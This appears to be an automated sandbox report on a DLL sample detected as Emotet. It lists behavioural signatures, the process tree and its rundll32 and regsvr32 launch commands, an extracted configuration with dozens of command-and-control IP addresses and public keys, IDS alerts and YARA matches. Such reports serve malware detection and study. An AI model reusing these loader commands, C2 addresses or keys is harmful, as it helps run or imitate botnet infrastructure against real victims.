Loading ...

Play interactive tourEdit tour

Windows Analysis Report pugKLanrj3

Overview

General Information

Sample Name:pugKLanrj3 (renamed file extension from none to dll)
Analysis ID:553115
MD5:db9535477013554eb17c837e6bd92324
SHA1:ba4fa056de631759ffa5600dd1142a1280d2f051
SHA256:df234584db0c8aa194c6873b78c8ae0018f0c5f445c5c8a2e90c5e3131310ad0
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Machine Learning detection for sample
Sigma detected: Suspicious Call by Ordinal
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4352 cmdline: loaddll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 3560 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5572 cmdline: rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 1312 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3156 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pugKLanrj3.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • rundll32.exe (PID: 6408 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5504 cmdline: rundll32.exe C:\Users\user\Desktop\pugKLanrj3.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ubjbeaftth\ufcmfnoys.ulp",EgkecrKVKe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5388 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ubjbeaftth\ufcmfnoys.ulp",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6312 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5104 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000004.00000002.312426426.0000000004790000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.303864837.0000000002E50000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.308717246.0000000004ED1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000009.00000002.312591906.0000000002E30000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 45 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.4fb0000.5.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              10.2.rundll32.exe.6c0000.2.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.rundll32.exe.4660000.5.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  10.2.rundll32.exe.4fa0000.21.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    10.2.rundll32.exe.4a90000.12.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 70 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3560, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1, ProcessId: 5572

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 10.2.rundll32.exe.4a90000.12.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: pugKLanrj3.dllVirustotal: Detection: 26%Perma Link
                      Source: pugKLanrj3.dllReversingLabs: Detection: 32%
                      Machine Learning detection for sampleShow sources
                      Source: pugKLanrj3.dllJoe Sandbox ML: detected
                      Source: pugKLanrj3.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.3:49748 -> 45.138.98.34:80
                      Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.3:49749 -> 69.16.218.101:8080
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 45.138.98.34:80
                      Source: Malware configuration extractorIPs: 69.16.218.101:8080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.168.220:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 104.131.62.48:8080
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 217.182.143.207:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 159.69.237.188:443
                      Source: Malware configuration extractorIPs: 116.124.128.206:8080
                      Source: Malware configuration extractorIPs: 128.199.192.135:8080
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Malware configuration extractorIPs: 185.148.168.15:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 190.90.233.66:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                      Source: global trafficTCP traffic: 192.168.2.3:49749 -> 69.16.218.101:8080
                      Source: unknownNetwork traffic detected: IP country count 12
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: svchost.exe, 00000011.00000003.419352679.0000024AA7D88000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000011.00000003.419352679.0000024AA7D88000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000011.00000003.419425357.0000024AA7D8E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.419352679.0000024AA7D88000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.419404673.0000024AA7D8E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000011.00000003.419425357.0000024AA7D8E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.419352679.0000024AA7D88000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.419404673.0000024AA7D8E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000011.00000002.435821452.0000024AA7D00000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000011.00000002.435659671.0000024AA74EF000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.10.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 0000000A.00000003.343075591.0000000004D31000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e16bf69187751
                      Source: svchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000011.00000003.408016367.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408127045.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.408267129.0000024AA8202000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000011.00000003.411715639.0000024AA7DB3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411696063.0000024AA7D92000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411749032.0000024AA8202000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.413775795.0000024AA7D8E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411646731.0000024AA7DCA000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.411611343.0000024AA7DCA000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100012D0 recvfrom,2_2_100012D0
                      Source: loaddll32.exe, 00000000.00000002.307427556.0000000000A4B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_1000FF59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_1000FF59

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.4fb0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4660000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4fa0000.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4a90000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4950000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4a90000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2e50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4710000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4630000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2e50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4fd0000.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.49b0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ed0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2e30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4d20000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4820000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4fe0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4ac0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4e70000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4960000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4990000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2e60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47f0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4710000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4570000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4c70000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.5000000.23.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4b90000.14.raw.unpack, type: UNPACKEDPE
